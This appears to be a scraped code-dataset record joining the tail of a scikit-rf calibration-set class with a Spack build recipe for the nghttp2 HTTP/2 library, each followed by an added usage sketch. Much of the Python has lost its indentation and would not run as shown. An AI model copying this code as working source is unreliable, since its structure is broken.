        if len(set(map(len, measured_sets))) != 1:
            raise IndexError('all measured NetworkSets must have the same '
                             'length for the dot-product combinatoric function')
self.cal_list = []
for k in range(len(measured_sets[0])):
measured = [measured_set[k] for measured_set in measured_sets]
cal = self.cal_class(ideals=ideals, measured= measured,
*args,**kwargs)
self.cal_list.append(cal)
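# --- illustrative sketch, not part of the original module -------------------
# Typical use of the Dot CalibrationSet; `ideals`, the measured NetworkSets,
# and the calibration class (e.g. skrf's OnePort) are placeholders supplied
# by the caller.
def _example_dot_usage(ideals, measured_sets, cal_class):
    cal_set = Dot(cal_class=cal_class, ideals=ideals,
                  measured_sets=measured_sets)
    corrected = cal_set.apply_cal(measured_sets[0][0])
    return corrected  # a NetworkSet, one corrected network per calibration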
| bsd-3-clause |
matthiasdiener/spack | var/spack/repos/builtin/packages/nghttp2/package.py | 5 | 2319 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Nghttp2(AutotoolsPackage):
"""nghttp2 is an implementation of HTTP/2 and its header compression
algorithm HPACK in C."""
homepage = "https://nghttp2.org/"
url = "https://github.com/nghttp2/nghttp2/releases/download/v1.26.0/nghttp2-1.26.0.tar.gz"
version('1.26.0', '83fa813b22bacbc6ea80dfb24847569f')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
depends_on('py-setuptools', type=('build'))
def setup_environment(self, spack_env, run_env):
site_packages_dir = '/'.join(
[self.spec.prefix.lib,
('python' + str(self.spec['python'].version.up_to(2))),
'site-packages'])
spack_env.prepend_path('PYTHONPATH', site_packages_dir)
@run_before('install')
def ensure_install_dir_exists(self):
site_packages_dir = '/'.join(
[self.spec.prefix.lib,
('python' + str(self.spec['python'].version.up_to(2))),
'site-packages'])
mkdirp(site_packages_dir)
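# --- illustrative sketch, not part of the original package ------------------
# From the command line, the package above would typically be exercised with
# Spack itself, e.g.:
#
#     spack install nghttp2@1.26.0
#     spack load nghttp2
#
# setup_environment() above then ensures the python bindings installed under
# site-packages are importable at build and run time.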
| lgpl-2.1 |